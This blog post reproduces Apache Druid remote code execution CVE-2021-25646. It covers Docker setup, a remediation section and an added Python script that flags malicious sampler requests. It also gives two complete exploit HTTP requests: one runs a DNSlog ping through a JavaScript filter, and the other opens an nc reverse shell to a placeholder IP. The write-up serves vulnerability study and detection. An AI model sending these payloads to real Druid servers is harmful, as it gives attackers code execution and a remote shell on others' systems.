0x00 Preface
The root cause of this vulnerability is a Druid-wide problem: the developers were careless with Jackson annotations, so an attacker can craft the incoming JSON string to control sensitive parameters.
Alibaba Cloud Security (@Litch1) officially reported this Apache Druid remote code execution vulnerability to Apache.
At that time the vulnerability was already known, but for some reason the extracted PoC was not published. When I woke up today I saw that many public accounts had posted about it, so I also put together what the various experts had published and wrote this reproduction article.
Apache Druid is a column-oriented, open-source, distributed data store written in Java, designed to ingest large volumes of event data quickly and to serve low-latency queries over that data.
By default Apache Druid has no authorization or authentication. An attacker can send specially crafted requests to execute arbitrary code with the privileges of the Druid server process.
Apache Druid includes the ability to execute user-provided JavaScript embedded in various types of requests. This functionality is intended for high-trust environments and is disabled by default. However, in Druid 0.20.0 and earlier, an authenticated user can send a malicious request that makes Druid run the user-supplied JavaScript and thereby execute arbitrary code.
0x01 Affected versions
Apache Druid < 0.20.1
0x02 Environment setup
I don't need to write much here; I read what peiqi wrote, followed it directly, and then reproduced it in practice.
Docker download link: https://github.com/apache/druid/archive/druid-0.20.0.zip
After downloading, enter the directory distribution/docker
Run the command docker-compose up -d to build and start the containers.
0x03 Vulnerability reproduction
1. PoC (the PoC is mainly tested with a DNSlog callback: ping xxxxx.dnslog.cn)
POST /druid/indexer/v1/sampler HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 995
Connection: close

{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-1T14:12:24.050Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('ping xxxxx.dnslog.cn')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}
2. Reverse shell (using nc to connect back)
POST /druid/indexer/v1/sampler HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1008
Connection: close

{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-1T14:12:24.050Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec(' nc xxx.xxx.xxx.xxx 9999 -e /bin/sh')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}
I did not actually carry out the reverse-shell experiment here; I just used peiqi's screenshot.
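From the defender's side, the useful thing to take from the two requests above is their shape: a POST to the sampler endpoint whose spec carries a javascript-typed filter, an embedded Java command-execution sink, and the empty-key {"enabled": true} object that switches JavaScript on for that single request even though it is disabled by default. The Python script below is an added example, not code from the original post or from the Druid project, that flags those indicators in a captured request body the way a WAF or proxy-log rule would. The two sample bodies are constructed (the command in the first is a placeholder), and listing /druid/indexer/v1/task next to the sampler path is an assumption based on both endpoints accepting the same ingestion spec format.

```python
import json
import re

# Constructed sample bodies, not captured traffic. The first mirrors the shape of
# the sampler request in the PoC above with the command replaced by a placeholder;
# the second is a normal sampler spec that uses a plain selector filter.
SAMPLE_MALICIOUS = json.dumps({
    "type": "index",
    "spec": {
        "ioConfig": {"type": "index",
                     "inputSource": {"type": "inline", "data": "{\"added\":1}"},
                     "inputFormat": {"type": "json"}},
        "dataSchema": {
            "dataSource": "sample",
            "timestampSpec": {"column": "timestamp", "format": "iso"},
            "dimensionsSpec": {},
            "transformSpec": {
                "transforms": [],
                "filter": {
                    "type": "javascript",
                    "dimension": "added",
                    "function": "function(value) {java.lang.Runtime.getRuntime().exec('CONSTRUCTED_PLACEHOLDER')}",
                    "": {"enabled": True},
                },
            },
        },
        "tuningConfig": {"type": "index"},
    },
    "samplerConfig": {"numRows": 500, "timeoutMs": 15000},
})

SAMPLE_BENIGN = json.dumps({
    "type": "index",
    "spec": {
        "ioConfig": {"type": "index",
                     "inputSource": {"type": "inline", "data": "{\"added\":1}"},
                     "inputFormat": {"type": "json"}},
        "dataSchema": {
            "dataSource": "sample",
            "timestampSpec": {"column": "timestamp", "format": "iso"},
            "dimensionsSpec": {},
            "transformSpec": {
                "transforms": [],
                "filter": {"type": "selector", "dimension": "added", "value": "1"},
            },
        },
        "tuningConfig": {"type": "index"},
    },
    "samplerConfig": {"numRows": 500, "timeoutMs": 15000},
})

# Strings that indicate a Java command-execution sink inside an embedded script.
SINK_PATTERN = re.compile(r"java\.lang\.Runtime|ProcessBuilder|\.exec\s*\(")

# Endpoints that accept ingestion specs: the sampler used by the PoC and (assumed
# here because it takes the same spec format) the task submission endpoint.
SPEC_ENDPOINTS = ("/druid/indexer/v1/sampler", "/druid/indexer/v1/task")


def walk(node, path=()):
    """Yield (path, dict) for every JSON object in the tree, depth first."""
    if isinstance(node, dict):
        yield path, node
        for key, value in node.items():
            yield from walk(value, path + (key,))
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from walk(value, path + (index,))


def find_indicators(body):
    """Return a list of human-readable findings for one request body."""
    try:
        doc = json.loads(body)
    except ValueError:
        return ["body is not valid JSON"]
    findings = []
    for path, obj in walk(doc):
        where = "/".join(str(p) for p in path) or "<root>"
        # JavaScript is disabled by default, so any javascript-typed filter,
        # transform or aggregator in a submitted spec deserves attention.
        if str(obj.get("type", "")).lower() == "javascript":
            findings.append("javascript-typed component at " + where)
        # The empty-key object the PoC uses to enable JavaScript per request.
        cfg = obj.get("")
        if isinstance(cfg, dict) and cfg.get("enabled") is True:
            findings.append('empty-key {"enabled": true} at ' + where)
        for key, value in obj.items():
            if isinstance(value, str) and SINK_PATTERN.search(value):
                findings.append("command-execution sink in " + where + "/" + str(key))
    return findings


def is_suspicious(method, path, body):
    """True when a spec-accepting endpoint receives a body with any indicator."""
    if method.upper() != "POST" or not path.startswith(SPEC_ENDPOINTS):
        return False
    return bool(find_indicators(body))


if __name__ == "__main__":
    for label, body in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, is_suspicious("POST", "/druid/indexer/v1/sampler", body),
              find_indicators(body))
```

The walker reports the JSON path of each hit, so an alert names the exact filter or transform that carried the script rather than just the request. Because JavaScript components are off by default, treating any javascript-typed object in a submitted spec as an indicator gives few false positives on a cluster that has never enabled the feature; the empty-key check catches the per-request enable trick even when the script body itself is obfuscated.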
0x04 Remediation
- Upgrade Apache Druid to the latest version, 0.20.1: https://github.com/apache/druid/releases/tag/druid-0.20.1
- Apply access control to Apache Druid so that only trusted hosts can reach the cluster servers.
Please credit when reposting: Adminxe's Blog » [Vulnerability Reproduction] Apache Druid remote code execution CVE-2021-25646